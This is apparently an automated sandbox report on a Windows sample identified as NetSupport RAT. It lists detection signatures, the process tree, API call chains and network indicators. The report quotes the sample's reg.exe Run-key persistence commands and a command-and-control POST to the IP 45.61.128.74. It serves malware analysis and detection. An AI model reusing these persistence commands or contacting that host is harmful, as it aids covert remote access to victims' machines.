Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562378
MD5:a3cea314d888a08b79002656a9f4b927
SHA1:396b9f96219785f0c80c69703dc623c23554affc
SHA256:64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3CEA314D888A08B79002656A9F4B927)
    • cmd.exe (PID: 2788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5336 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 4512 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 5552 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
      • reg.exe (PID: 5768 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 4544 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 6488 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 1936 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 4000 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 3360 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\shv.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 39 entries
                      SourceRuleDescriptionAuthorStrings
                      9.2.shv.exe.ab0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        6.2.shv.exe.ab0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          13.2.shv.exe.ab0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            13.2.shv.exe.74a90000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              14.2.shv.exe.ab0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 38 entries

                                System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\shv.exe, CommandLine: C:\Users\Public\Netstat\shv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\shv.exe, NewProcessName: C:\Users\Public\Netstat\shv.exe, OriginalFileName: C:\Users\Public\Netstat\shv.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\shv.exe, ProcessId: 5552, ProcessName: shv.exe
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\shv.exe, Initiated: true, ProcessId: 5552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49708
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 5336, ProcessName: reg.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 5336, ProcessName: reg.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-25T15:10:10.376773+010028277451Malware Command and Control Activity Detected192.168.2.64970845.61.128.74443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: C:\Users\Public\Netstat\shv.exeReversingLabs: Detection: 28%
                                Source: file.exeReversingLabs: Detection: 39%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AD570
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,9_2_110AD570
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7940BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,0_2_00007FF70E7BFCA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,9_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,9_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_1110AFD0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49708 -> 45.61.128.74:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
                                Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
